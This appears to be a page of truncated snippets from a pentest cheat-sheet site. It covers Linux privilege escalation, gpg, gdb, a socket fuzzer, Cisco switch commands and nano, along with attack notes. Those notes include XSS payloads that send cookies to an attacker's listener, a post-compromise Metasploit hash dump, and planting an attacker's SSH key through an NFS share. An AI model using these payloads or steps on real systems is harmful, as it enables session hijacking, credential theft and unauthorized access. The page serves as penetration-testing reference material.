Enumeration is the key.
(Linux) privilege escalation is all about:
Collect - Enumeration, more enumeration and some more enumeration.
Process - Sort through data, analyse and prioritisation.
Search - Know what to search for and where to find the exploit code.
Adapt - Customize the exploit, so it fits. Not every exploit work for every system &q...
Score: 0
Encrypt
------------
sudo gpg -e ~/Desktop/file.doc
This will prompt you to type in the persons name (public key) to encrypt with.
Decrypt
-----------
sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc
Import other users' public keys by using:
sudo gpg --import <key>...
Score: 0
set disassembly-flavor intel
$ cat ~/.bash_aliases | grep gdb
alias gdb='gdb -quiet'
Running gdb
------------------
$ gdb - run, then use file command to load object
$ gdb -quiet - supress copyright information
$ gdb object - normal debug
$ gdb object core - analyze core dump
$ gdb object pid - atta...
Score: 0
[+] Fuzzing:
import socket
buffer = ["A"]
counter = 50
while len(buffer) <= 1000:
buffer.append("A" * counter)
counter = counter + 50
for buffstring in buffer:
print "Fuzzing:" + str(len(buffstring))
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( ("1...
Score: 0
[+] After compromising a Windows machine:
[>] List the domain administrators:
From Shell - net group "Domain Admins" /domain
[>] Dump the hashes (Metasploit)
msf > run post/windows/gather/smart_hashdump GETSYSTEM=FALSE
[>] Find the admins (Metasploit)
spool /tmp/enumdomainusers.txt
msf > use auxiliary/scanner/s...
Score: 0
[+] Cookie Stealing:
[-] Start Web Service
python -m SimpleHTTPServer 80
[-] Use one of the following XSS payloads:
<script>document.location="http://192.168.0.60/?c="+document.cookie;</script>
<script>new Image().src="http://192.168.0.60/index.php?c="+document.cookie;</script>...
Score: 0
--- Verify Basic Configuration:
Shows information about the switch and its interfaces, RAM, NVRAM, flash, IOS, etc.
SW1# show version
Shows the current configuration file stored in DRAM.
SW1# show running-config
Shows the configuration file stored in NVRAM which is used at first boot process.
SW1# show startup-config
Lists the comman...
Score: 0
# Enumerate Users via Finger
finger user@192.168.0.20
# Show nfs shares available
showmount -e 192.168.1.54
# User nfspysh to mount share and create .ssh directory
nfspysh -o server=192.168.0.20:/home/user
mkdir .ssh
cd .ssh
# Generate ssh key pair
ssh-keygen
cp id_rsa.pub /tmp/authorized_keys
# Transfer attacker public key to ho...
Score: 0
[+] Main tasks:
Any third party installed software and all associated versions.
Password policy applied locally via net accounts commands.
Domain policy applied, including domain password policy.
Logging settings.
Running services and unquoted service paths.
Permissions set on services.
List of patches and hotfixes installed.
Efficacy of ...
Score: 0
[+] nano Shortcuts
ctrl v Next page.
ctrl y Previous page.
ctrl w Where is (find).
ctrl k Cut that line of test.
ctrl x Exit editor.
[+] Create a text file:
touch file Creates an empty file.
ifconfig > tmp pipe the output of a command
nano file
[+] Create a file and append text to it:
ifconfig > tmp
echo &g...
Score: 0